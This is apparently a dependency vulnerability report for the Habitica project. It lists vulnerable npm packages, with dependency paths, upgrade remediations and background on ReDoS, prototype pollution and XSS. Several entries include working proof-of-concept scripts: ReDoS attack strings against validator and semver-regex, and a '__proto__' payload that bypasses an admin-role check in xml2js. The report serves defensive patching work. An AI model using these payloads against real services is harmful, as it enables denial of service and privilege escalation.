Upgrade validator to version 13.15.20 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0
Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isSlug function.
PoC
var validator = require("validator");

function build_attack(n) {
  var ret = "111";
  for (var i = 0; i < n; i++) {
    ret += "a";
  }
  return ret + "_";
}

for (var i = 1; i <= 50000; i++) {
  if (i % 10000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    validator.isSlug(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}
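The attack string above only becomes expensive at large lengths, so capping input size before any regex-based validator bounds the worst case. A sketch (the 64-character limit and function name are illustrative assumptions):

```javascript
// Cheap pre-check: only strings passing this are worth handing to a
// regex-based validator such as isSlug.
function isSlugCandidate(input) {
  return typeof input === "string" && input.length <= 64;
}
```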
Details
See the ReDoS details section earlier in this report.
Remediation
Upgrade validator to version 13.6.0 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0
Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isHSL function.
PoC
var validator = require("validator");

function build_attack(n) {
  var ret = "hsla(0";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "◎";
}

for (var i = 1; i <= 50000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    validator.isHSL(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}
Details
See the ReDoS details section earlier in this report.
Remediation
Upgrade validator to version 13.6.0 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0
Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isEmail function.
PoC
var validator = require("validator");

function build_attack(n) {
  var ret = "";
  for (var i = 0; i < n; i++) {
    ret += "<";
  }
  return ret + "";
}

for (var i = 1; i <= 50000; i++) {
  if (i % 10000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    validator.isEmail(attack_str, { allow_display_name: true });
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations make the engine work very slowly (the number of steps grows exponentially with input size, as shown above), allowing an attacker to craft input that consumes excessive CPU, resulting in a Denial of Service.
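One practical mitigation, sketched below, is to rewrite the ambiguous pattern into an equivalent one without nested quantifiers: `A(B|C+)+D` accepts an 'A', then any non-empty run of 'B's and 'C's, then a 'D', which the character class `[BC]+` expresses with exactly one matching path per character (the anchors are added here for illustration):

```javascript
// The vulnerable pattern and an equivalent safe rewrite.
const evil = /^A(B|C+)+D$/; // catastrophic backtracking on near-misses
const safe = /^A[BC]+D$/;   // linear time: one way to match each character

// Both agree on matching inputs:
console.log(evil.test("ABCBCCCD"), safe.test("ABCBCCCD")); // true true

// Only the safe pattern can be run on a long near-miss; the evil one
// would need billions of backtracking steps for this input.
console.log(safe.test("A" + "C".repeat(40) + "X")); // false, returns immediately
```

The rewrite works because `(B|C+)+` and `[BC]+` accept exactly the same strings, but the former gives the engine many ways to partition a run of C's while the latter gives it only one.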
Remediation
Upgrade validator to version 13.6.0 or higher.
References
medium severity
- Vulnerable module: xml2js
- Introduced through: amazon-payments@0.2.9
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › xml2js@0.4.4
Overview
Affected versions of this package are vulnerable to Prototype Pollution due to allowing an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.
PoC
var parseString = require('xml2js').parseString;

let normal_user_request = "<role>admin</role>";
let malicious_user_request = "<__proto__><role>admin</role></__proto__>";

const update_user = (userProp) => {
  // A user cannot alter his role. This way we prevent privilege escalations.
  parseString(userProp, function (err, user) {
    if (user.hasOwnProperty("role") && user?.role.toLowerCase() === "admin") {
      console.log("Unauthorized Action");
    } else {
      console.log(user?.role[0]);
    }
  });
}

update_user(normal_user_request);
update_user(malicious_user_request);
Details
Prototype Pollution is a vulnerability affecting JavaScript. It refers to the ability to inject properties into existing JavaScript language constructs, such as object prototypes. JavaScript allows all Object attributes to be altered, including magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, the prototype of the base object by injecting other values. Properties on Object.prototype are then inherited by all JavaScript objects through the prototype chain. When that happens, it leads either to denial of service by triggering JavaScript exceptions, or to tampering with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
- Unsafe Object recursive merge
- Property definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty(), the condition that checks if the property exists and is an object on both the target and the source passes, and the merge recurses with the prototype of Object as the target and the attacker-defined object as the source. Properties are then copied onto the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
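The high-level merge model above can be demonstrated with a small self-contained sketch. The `merge` function below is an illustration of the vulnerable pattern, not code from lodash, Hoek, or xml2js:

```javascript
// A deliberately vulnerable recursive merge, following the model above.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    if (key in target && typeof target[key] === "object" && typeof source[key] === "object") {
      merge(target[key], source[key]); // for "__proto__", recurses into Object.prototype
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates an own "__proto__" property, so the key survives parsing:
const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, malicious); // a "clone" -- the special sub-class mentioned above

console.log(({}).isAdmin); // true -- every object now appears to be admin
delete Object.prototype.isAdmin; // clean up the pollution
```

Note that a literal `{__proto__: ...}` in source code would not trigger this; the attack relies on the key arriving via a parser (JSON, XML) that defines it as an own property.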
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
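A sketch of that attack, using a hypothetical `setByPath` helper modeled on this API shape (not any specific library's implementation):

```javascript
// A minimal path-based property setter with no key filtering.
function setByPath(object, path, value) {
  const keys = path.split(".");
  let cur = object;
  for (const key of keys.slice(0, -1)) {
    if (typeof cur[key] !== "object" || cur[key] === null) cur[key] = {};
    cur = cur[key]; // for "__proto__" this walks up to Object.prototype
  }
  cur[keys[keys.length - 1]] = value;
}

const target = {};
setByPath(target, "__proto__.myValue", "polluted");

console.log(({}).myValue); // "polluted" -- set on the shared prototype
delete Object.prototype.myValue; // clean up
```

Real libraries defend against this by rejecting `__proto__`, `constructor`, and `prototype` as path segments.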
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
- Freeze the prototype: use Object.freeze(Object.prototype).
- Require schema validation of JSON input.
- Avoid using unsafe recursive merge functions.
- Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
- As a best practice use Map instead of Object.
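Hedged sketches of three of these defenses (illustrative only; freezing `Object.prototype` can break libraries that legitimately extend it, so test before adopting):

```javascript
// 1. Freeze the prototype: the polluting assignment becomes a silent
//    no-op (or a TypeError in strict mode).
Object.freeze(Object.prototype);
try {
  Object.prototype.isAdmin = true;
} catch (e) {
  // TypeError under "use strict"
}
console.log(({}).isAdmin); // undefined -- pollution failed

// 2. Prototype-less objects have no chain to pollute:
const bare = Object.create(null);
console.log("__proto__" in bare); // false

// 3. A Map treats "__proto__" as an ordinary key, not a property:
const props = new Map();
props.set("__proto__", { isAdmin: true });
console.log(({}).isAdmin); // still undefined
```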
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade xml2js to version 0.5.0 or higher.
References
medium severity
- Vulnerable module: @tootallnate/once
- Introduced through: @google-cloud/trace-agent@7.1.2 and firebase-admin@12.7.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @google-cloud/trace-agent@7.1.2 › @google-cloud/common@4.0.3 › teeny-request@8.0.3 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › firebase-admin@12.7.0 › @google-cloud/storage@7.19.0 › teeny-request@9.0.0 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › firebase-admin@12.7.0 › @google-cloud/storage@7.19.0 › retry-request@7.0.2 › teeny-request@9.0.0 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › firebase-admin@12.7.0 › @google-cloud/firestore@7.11.6 › google-gax@4.6.1 › retry-request@7.0.2 › teeny-request@9.0.0 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
Overview
Affected versions of this package are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.
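The hang described above is the general hazard of awaiting a promise that may never settle. A generic guard (an assumption for illustration, not part of `@tootallnate/once`'s API) is to race the promise against a timeout:

```javascript
// Reject if the wrapped promise has not settled within `ms` milliseconds.
function withTimeout(promise, ms) {
  let timer;
  const timeout = new Promise((_, reject) => {
    timer = setTimeout(() => reject(new Error(`timed out after ${ms}ms`)), ms);
  });
  return Promise.race([promise, timeout]).finally(() => clearTimeout(timer));
}

// A promise that never settles (like the vulnerable once() after an abort)
// now fails fast instead of hanging its caller forever:
withTimeout(new Promise(() => {}), 100)
  .catch((err) => console.log(err.message)); // "timed out after 100ms"
```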
Remediation
Upgrade @tootallnate/once to version 3.0.1 or higher.
References
medium severity
- Vulnerable module: passport
- Introduced through: passport@0.5.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › passport@0.5.3
Remediation: Upgrade to passport@0.6.0.
Overview
passport is a simple, unobtrusive authentication library for Node.js.
Affected versions of this package are vulnerable to Session Fixation. When a user logs in or logs out, the session is regenerated instead of being closed.
Remediation
Upgrade passport to version 0.6.0 or higher.
References
medium severity
- Vulnerable module: eslint
- Introduced through: eslint@8.57.1 and eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint@8.57.1
Remediation: Upgrade to eslint@9.26.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0
Overview
eslint is a pluggable linting utility for JavaScript and JSX.
Affected versions of this package are vulnerable to Uncontrolled Recursion in the isSerializable function when handling objects with circular references during the serialization process. An attacker can cause the application to crash or become unresponsive by supplying specially crafted input that triggers infinite recursion.
Remediation
Upgrade eslint to version 9.26.0 or higher.
References
medium severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a regular expression for matching semver versions.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS).
PoC
// import of the vulnerable library
const semverRegex = require('semver-regex');

// import of measurement tools
const { PerformanceObserver, performance } = require('perf_hooks');

// config of measurement tools
const obs = new PerformanceObserver((items) => {
  console.log(items.getEntries()[0].duration);
  performance.clearMarks();
});
obs.observe({ entryTypes: ['measure'] });

// base version string
let version = "v1.1.3-0a"

// Adding the evil code, resulting in string
// v1.1.3-0aa.aa.aa.aa.aa.aa.a…a.a
for (let i = 0; i < 20; i++) {
  version += "a.a"
}

// produce a good version
// Parses well for the regex in milliseconds
let goodVersion = version + "2"

// good version proof
performance.mark("good before")
const goodresult = semverRegex().test(goodVersion);
performance.mark("good after")
console.log(`Good result: ${goodresult}`)
performance.measure('Good', 'good before', 'good after');

// create a bad/exploit version that is invalid due to the last $ sign.
// This will cause the nodejs engine to hang; if not, increase the a.a
// additions above a bit.
let badVersion = version + "aaaaaaa$"

// exploit proof
performance.mark("bad before")
const badresult = semverRegex().test(badVersion);
performance.mark("bad after")
console.log(`Bad result: ${badresult}`)
performance.measure('Bad', 'bad before', 'bad after');
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- `A`: The string must start with the letter 'A'.
- `(B|C+)+`: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this group states that we can look for one or more matches of the group.
- `D`: Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing the regex against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, roughly 35 times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C
The engine has to try each of those combinations to see if any of them match the expression. When you combine that with the other steps the engine must take, the RegEx 101 debugger shows that the engine takes a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations make the engine work very slowly (the number of steps grows exponentially with input size, as shown above), allowing an attacker to craft input that consumes excessive CPU, resulting in a Denial of Service.
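Until an upgrade is possible, one common mitigation (an assumption for illustration, not semver-regex's own guidance) is to cap input length before testing, since real semver strings are short and the blow-up requires long crafted input:

```javascript
// Reject oversized input before it ever reaches the regex engine.
// MAX_LEN and the simplified pattern below are illustrative assumptions,
// not the module's actual pattern.
const MAX_LEN = 256;
const semverish = /^v?\d+\.\d+\.\d+(-[\w.]+)?$/;

function safeSemverTest(input) {
  if (typeof input !== "string" || input.length > MAX_LEN) return false;
  return semverish.test(input);
}

console.log(safeSemverTest("v1.2.3"));          // true
console.log(safeSemverTest("a".repeat(10000))); // false -- rejected by length alone
```

The length check bounds the regex engine's worst case regardless of how pathological the pattern is.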
Remediation
Upgrade semver-regex to version 3.1.2 or higher.
References
low severity
- Vulnerable module: bootstrap
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › bootstrap@3.4.1
Overview
bootstrap is a popular front-end framework for faster and easier web development.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the Tooltip and Popover components due to improper neutralization of input during web page generation. An attacker can manipulate the output of web pages by injecting malicious scripts into the title attribute.
Note:
The Bootstrap 3 version is End-of-Life and will not receive any updates to address this issue.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they've been correctly escaped in the application code, and in this way the attempted attack is diverted.
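The escaping idea can be sketched as a small helper (illustrative only; production code should use a maintained library or the templating engine's built-in escaping):

```javascript
// Replace HTML-significant characters with entities so injected markup
// renders as inert text instead of executing.
function escapeHtml(str) {
  const entities = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return str.replace(/[&<>"']/g, (ch) => entities[ch]);
}

console.log(escapeHtml('<script>alert("xss")</script>'));
// &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```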
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | Client | The attacker injects code that appears safe, but is then rewritten and modified by the browser while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
- Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade bootstrap to version 4.0.0 or higher.